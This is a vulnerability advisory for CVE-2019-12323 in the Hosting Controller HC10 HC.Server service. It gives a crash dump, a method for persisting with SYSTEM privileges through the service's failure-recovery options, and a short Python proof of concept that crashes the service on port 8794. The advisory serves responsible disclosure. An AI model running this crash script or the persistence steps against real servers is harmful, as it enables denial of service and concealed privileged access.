134 lines
No EOL
4.5 KiB
Text
134 lines
No EOL
4.5 KiB
Text
[+] Credits: John Page (aka hyp3rlinx)
|
|
[+] Website: hyp3rlinx.altervista.org
|
|
[+] Source: http://hyp3rlinx.altervista.org/advisories/HC10-HC.SERVER-10.14-REMOTE-INVALID-POINTER-WRITE.txt
|
|
[+] ISR: ApparitionSec
|
|
|
|
|
|
|
|
[Vendor]
|
|
www.hostingcontroller.com
|
|
|
|
|
|
[Product]
|
|
HC10 HC.Server Service 10.14
|
|
|
|
HC10 is a unified hosting automation control panel for web hosts and Cloud based service providers to manage both Windows & Linux servers
|
|
simultaneously as part of a single cluster. HC works on an N-tier user model.
|
|
|
|
|
|
[Vulnerability Type]
|
|
Remote Invalid Pointer Write
|
|
|
|
|
|
[CVE Reference]
|
|
CVE-2019-12323
|
|
|
|
|
|
[Security Issue]
|
|
The HC.Server service in Hosting Controller HC10 10.14 allows an Invalid Pointer Write DoS if attackers can reach the service on port 8794.
|
|
In addition this can potentially be leveraged for post exploit persistence with SYSTEM privileges, if physical access or malware is involved.
|
|
|
|
If a physical attacker or malware can set its own program for the service failure recovery options, it can be used to maintain persistence.
|
|
Afterwards, it can be triggered by sending a malicious request to DoS the service, which in turn can start the attackers recovery program.
|
|
The attackers program can then try restarting the affected service to try an stay unnoticed by calling "sc start HCServerService".
|
|
|
|
Services failure flag recovery options for "enabling actions for stops or errors" and can be set in the services "Recovery" properties tab
|
|
or on the command line. Authentication is not required to reach the vulnerable service, this was tested successfully on Windows 7/10.
|
|
|
|
|
|
SERVICE_NAME: HCServerService
|
|
TYPE : 10 WIN32_OWN_PROCESS
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 0 IGNORE
|
|
BINARY_PATH_NAME : "C:\Program Files\Hosting Controller\Provisioning\HC.Server.exe"
|
|
LOAD_ORDER_GROUP :
|
|
TAG : 0
|
|
DISPLAY_NAME : HC Server Service
|
|
DEPENDENCIES : HCProvisioningService
|
|
SERVICE_START_NAME : LocalSystem
|
|
|
|
|
|
Crash Dump:
|
|
|
|
INVALID_POINTER_WRITE_EXPLOITABLE
|
|
|
|
CONTEXT: (.ecxr)
|
|
rax=0000000000000bfd rbx=0000000000df94f0 rcx=03743db166a90000
|
|
rdx=0000000080000000 rsi=00000000000000b4 rdi=0000000000000000
|
|
rip=0000000140025b6c rsp=000000000118f570 rbp=0000000000000000
|
|
r8=000000000000001f r9=00000000000006fe r10=0000000000000603
|
|
r11=0000000000df0158 r12=0000000000000000 r13=0000000000000000
|
|
r14=0000000000000000 r15=0000000000000000
|
|
iopl=0 nv up ei pl nz na pe nc
|
|
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
|
|
HC_Server+0x25b6c:
|
|
00000001`40025b6c c68404d001000000 mov byte ptr [rsp+rax+1D0h],0 ss:00000000`0119033d=??
|
|
Resetting default scope
|
|
|
|
FAULTING_IP:
|
|
HC_Server+25b6c
|
|
00000001`40025b6c c68404d001000000 mov byte ptr [rsp+rax+1D0h],0
|
|
|
|
EXCEPTION_RECORD: (.exr -1)
|
|
ExceptionAddress: 0000000140025b6c (HC_Server+0x0000000000025b6c)
|
|
ExceptionCode: c0000005 (Access violation)
|
|
ExceptionFlags: 00000000
|
|
NumberParameters: 2
|
|
Parameter[0]: 0000000000000001
|
|
Parameter[1]: 000000000119033d
|
|
Attempt to write to address 000000000119033d
|
|
|
|
PROCESS_NAME: HC.Server.exe
|
|
|
|
|
|
|
|
[Exploit/POC]
|
|
1) Configure the HCServiceService recovery failure options to an arbitrary program.
|
|
2) Trigger the remote invalid pointer write to gain persistence with SYSTEM privileges.
|
|
|
|
from socket import *
|
|
|
|
IP = raw_input("[+] HC Server Service IP ")
|
|
PORT = 8794
|
|
|
|
payload = "A"*4000
|
|
s=socket(AF_INET,SOCK_STREAM)
|
|
s.connect((IP, PORT))
|
|
s.send(payload)
|
|
s.close()
|
|
|
|
print "Triggering HC10 Server Service Xploit"
|
|
print "hyp3rlinx"
|
|
|
|
|
|
|
|
[Network Access]
|
|
Remote
|
|
|
|
|
|
|
|
[Severity]
|
|
Medium
|
|
|
|
|
|
|
|
[Disclosure Timeline]
|
|
Vendor Notification: May 14, 2019
|
|
No reply
|
|
Second notification: May 21, 2019
|
|
Vendor "will change the implementation soon in any of forthcoming installer." : May 22, 2019
|
|
mitre assign CVE: May 27, 2019
|
|
Vendor : "New installer to be released June 13, 2019"
|
|
June 16, 2019 : Public Disclosure
|
|
|
|
|
|
|
|
[+] Disclaimer
|
|
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
|
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
|
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
|
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
|
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
|
or exploits by the author or elsewhere. All content (c).
|
|
|
|
hyp3rlinx |